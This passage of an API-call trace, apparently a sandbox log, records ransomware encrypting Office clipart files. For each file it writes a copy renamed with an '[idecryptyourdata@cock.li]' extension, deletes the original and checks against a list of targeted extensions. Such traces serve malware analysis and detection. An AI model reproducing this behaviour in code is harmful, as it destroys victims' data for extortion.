lpNewFilePointer=0x0) returned 1 [0188.107] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0188.107] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0146142.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0146142.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0188.107] GetLastError () returned 0x0 [0188.107] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0xb5ac, lpOverlapped=0x0) returned 1 [0188.159] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xb5b0, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xb5b0, lpOverlapped=0x0) returned 1 [0188.161] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0188.161] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0188.161] SetEndOfFile (hFile=0x380) returned 1 [0188.161] CloseHandle (hObject=0x380) returned 1 [0188.161] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0188.161] SetEndOfFile (hFile=0x334) returned 1 [0188.163] CloseHandle (hObject=0x334) returned 1 [0188.163] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0146142.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0188.163] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0146142.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0146142.jpg")) returned 1 [0188.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0146142.JPG") returned 68 [0188.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0146142.JPG") returned 68 [0188.164] lstrlenW (lpString=".doc") returned 4 [0188.164] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0188.164] lstrlenW (lpString=".docx") returned 5 [0188.164] lstrcmpiW (lpString1=".docx", lpString2="2.JPG") returned -1 [0188.164] lstrlenW (lpString=".pdf") returned 4 [0188.164] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0188.164] lstrlenW (lpString=".xls") returned 4 [0188.164] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0188.164] lstrlenW (lpString=".xlsx") returned 5 [0188.164] lstrcmpiW (lpString1=".xlsx", lpString2="2.JPG") returned -1 [0188.164] lstrlenW (lpString=".ppt") returned 4 [0188.164] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0188.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0146142.JPG") returned 68 [0188.164] lstrlenW (lpString=".zip") returned 4 [0188.164] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0188.164] lstrlenW (lpString=".rar") returned 4 [0188.164] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0188.164] lstrlenW (lpString=".bz2") returned 4 [0188.164] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0188.164] lstrlenW (lpString=".7z") returned 3 [0188.164] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0188.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0146142.JPG") returned 68 [0188.165] lstrlenW (lpString=".dbf") returned 4 [0188.165] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0188.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0146142.JPG") returned 68 [0188.165] lstrlenW (lpString=".1cd") returned 4 [0188.165] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0188.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0146142.JPG") returned 68 [0188.165] lstrlenW (lpString=".jpg") returned 4 [0188.165] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0188.165] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0188.165] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0188.165] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149018.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0149018.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0188.166] GetLastError () returned 0x0 [0188.166] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x6b01, lpOverlapped=0x0) returned 1 [0188.181] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x6b10, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x6b10, lpOverlapped=0x0) returned 1 [0188.182] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0188.182] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0188.182] SetEndOfFile (hFile=0x380) returned 1 [0188.182] CloseHandle (hObject=0x380) returned 1 [0188.182] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0188.182] SetEndOfFile (hFile=0x334) returned 1 [0188.183] CloseHandle (hObject=0x334) returned 1 [0188.183] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149018.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0188.183] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149018.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0149018.jpg")) returned 1 [0188.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149018.JPG") returned 68 [0188.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149018.JPG") returned 68 [0188.184] lstrlenW (lpString=".doc") returned 4 [0188.184] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0188.184] lstrlenW (lpString=".docx") returned 5 [0188.184] lstrcmpiW (lpString1=".docx", lpString2="8.JPG") returned -1 [0188.184] lstrlenW (lpString=".pdf") returned 4 [0188.184] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0188.184] lstrlenW (lpString=".xls") returned 4 [0188.184] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0188.184] lstrlenW (lpString=".xlsx") returned 5 [0188.184] lstrcmpiW (lpString1=".xlsx", lpString2="8.JPG") returned -1 [0188.184] lstrlenW (lpString=".ppt") returned 4 [0188.184] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0188.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149018.JPG") returned 68 [0188.184] lstrlenW (lpString=".zip") returned 4 [0188.184] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0188.185] lstrlenW (lpString=".rar") returned 4 [0188.185] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0188.185] lstrlenW (lpString=".bz2") returned 4 [0188.185] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0188.185] lstrlenW (lpString=".7z") returned 3 [0188.185] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0188.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149018.JPG") returned 68 [0188.185] lstrlenW (lpString=".dbf") returned 4 [0188.185] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0188.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149018.JPG") returned 68 [0188.185] lstrlenW (lpString=".1cd") returned 4 [0188.185] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0188.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149018.JPG") returned 68 [0188.185] lstrlenW (lpString=".jpg") returned 4 [0188.185] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0188.185] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0188.185] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0188.185] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150150.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0150150.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0188.186] GetLastError () returned 0x0 [0188.186] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0xb544, lpOverlapped=0x0) returned 1 [0188.292] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xb550, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xb550, lpOverlapped=0x0) returned 1 [0188.294] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0188.294] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0188.294] SetEndOfFile (hFile=0x380) returned 1 [0188.294] CloseHandle (hObject=0x380) returned 1 [0188.294] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0188.294] SetEndOfFile (hFile=0x334) returned 1 [0188.296] CloseHandle (hObject=0x334) returned 1 [0188.296] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150150.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0189.502] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150150.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0150150.wmf")) returned 1 [0189.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150150.WMF") returned 68 [0189.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150150.WMF") returned 68 [0189.503] lstrlenW (lpString=".doc") returned 4 [0189.503] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0189.503] lstrlenW (lpString=".docx") returned 5 [0189.503] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0189.503] lstrlenW (lpString=".pdf") returned 4 [0189.503] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0189.503] lstrlenW (lpString=".xls") returned 4 [0189.503] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0189.503] lstrlenW (lpString=".xlsx") returned 5 [0189.503] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0189.503] lstrlenW (lpString=".ppt") returned 4 [0189.503] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0189.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150150.WMF") returned 68 [0189.503] lstrlenW (lpString=".zip") returned 4 [0189.503] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0189.503] lstrlenW (lpString=".rar") returned 4 [0189.503] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0189.503] lstrlenW (lpString=".bz2") returned 4 [0189.503] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0189.503] lstrlenW (lpString=".7z") returned 3 [0189.503] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0189.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150150.WMF") returned 68 [0189.503] lstrlenW (lpString=".dbf") returned 4 [0189.503] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0189.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150150.WMF") returned 68 [0189.504] lstrlenW (lpString=".1cd") returned 4 [0189.504] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0189.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150150.WMF") returned 68 [0189.504] lstrlenW (lpString=".jpg") returned 4 [0189.504] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0189.504] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0189.504] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0189.504] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151041.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151041.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0189.505] GetLastError () returned 0x0 [0189.505] ReadFile (in: hFile=0x394, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x1104, lpOverlapped=0x0) returned 1 [0190.461] WriteFile (in: hFile=0x3a8, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x1110, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x1110, lpOverlapped=0x0) returned 1 [0190.746] ReadFile (in: hFile=0x394, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0190.746] WriteFile (in: hFile=0x3a8, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0190.746] SetEndOfFile (hFile=0x3a8) returned 1 [0190.746] CloseHandle (hObject=0x3a8) returned 1 [0190.746] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0190.746] SetEndOfFile (hFile=0x394) returned 1 [0190.747] CloseHandle (hObject=0x394) returned 1 [0190.747] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151041.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0190.908] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151041.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151041.wmf")) returned 1 [0190.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151041.WMF") returned 68 [0190.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151041.WMF") returned 68 [0190.909] lstrlenW (lpString=".doc") returned 4 [0190.909] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0190.909] lstrlenW (lpString=".docx") returned 5 [0190.909] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0190.909] lstrlenW (lpString=".pdf") returned 4 [0190.909] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0190.909] lstrlenW (lpString=".xls") returned 4 [0190.909] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0190.910] lstrlenW (lpString=".xlsx") returned 5 [0190.910] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0190.910] lstrlenW (lpString=".ppt") returned 4 [0190.910] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0190.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151041.WMF") returned 68 [0190.910] lstrlenW (lpString=".zip") returned 4 [0190.910] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0190.910] lstrlenW (lpString=".rar") returned 4 [0190.910] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0190.910] lstrlenW (lpString=".bz2") returned 4 [0190.910] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0190.910] lstrlenW (lpString=".7z") returned 3 [0190.910] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0190.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151041.WMF") returned 68 [0190.910] lstrlenW (lpString=".dbf") returned 4 [0190.910] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0190.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151041.WMF") returned 68 [0190.910] lstrlenW (lpString=".1cd") returned 4 [0190.910] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0190.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151041.WMF") returned 68 [0190.910] lstrlenW (lpString=".jpg") returned 4 [0190.910] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0190.911] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0190.911] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0190.911] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151063.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151063.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0190.912] GetLastError () returned 0x0 [0190.912] ReadFile (in: hFile=0x360, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x2988, lpOverlapped=0x0) returned 1 [0191.120] WriteFile (in: hFile=0x374, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x2990, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x2990, lpOverlapped=0x0) returned 1 [0191.122] ReadFile (in: hFile=0x360, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0191.122] WriteFile (in: hFile=0x374, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0191.122] SetEndOfFile (hFile=0x374) returned 1 [0191.122] CloseHandle (hObject=0x374) returned 1 [0191.122] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0191.122] SetEndOfFile (hFile=0x360) returned 1 [0191.123] CloseHandle (hObject=0x360) returned 1 [0191.123] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151063.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0191.124] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151063.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151063.wmf")) returned 1 [0191.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151063.WMF") returned 68 [0191.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151063.WMF") returned 68 [0191.124] lstrlenW (lpString=".doc") returned 4 [0191.124] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0191.125] lstrlenW (lpString=".docx") returned 5 [0191.125] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0191.125] lstrlenW (lpString=".pdf") returned 4 [0191.125] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0191.125] lstrlenW (lpString=".xls") returned 4 [0191.125] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0191.125] lstrlenW (lpString=".xlsx") returned 5 [0191.125] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0191.125] lstrlenW (lpString=".ppt") returned 4 [0191.125] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0191.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151063.WMF") returned 68 [0191.125] lstrlenW (lpString=".zip") returned 4 [0191.125] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0191.125] lstrlenW (lpString=".rar") returned 4 [0191.125] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0191.125] lstrlenW (lpString=".bz2") returned 4 [0191.125] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0191.125] lstrlenW (lpString=".7z") returned 3 [0191.125] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0191.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151063.WMF") returned 68 [0191.125] lstrlenW (lpString=".dbf") returned 4 [0191.125] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0191.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151063.WMF") returned 68 [0191.126] lstrlenW (lpString=".1cd") returned 4 [0191.126] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0191.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151063.WMF") returned 68 [0191.126] lstrlenW (lpString=".jpg") returned 4 [0191.126] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0191.127] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0191.127] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0191.127] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151073.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151073.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0191.128] GetLastError () returned 0x0 [0191.128] ReadFile (in: hFile=0x360, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x3418, lpOverlapped=0x0) returned 1 [0194.467] WriteFile (in: hFile=0x374, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x3420, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x3420, lpOverlapped=0x0) returned 1 [0195.690] ReadFile (in: hFile=0x360, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0195.690] WriteFile (in: hFile=0x374, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0195.690] SetEndOfFile (hFile=0x374) returned 1 [0195.690] CloseHandle (hObject=0x374) returned 1 [0195.690] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.690] SetEndOfFile (hFile=0x360) returned 1 [0195.691] CloseHandle (hObject=0x360) returned 1 [0195.691] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft 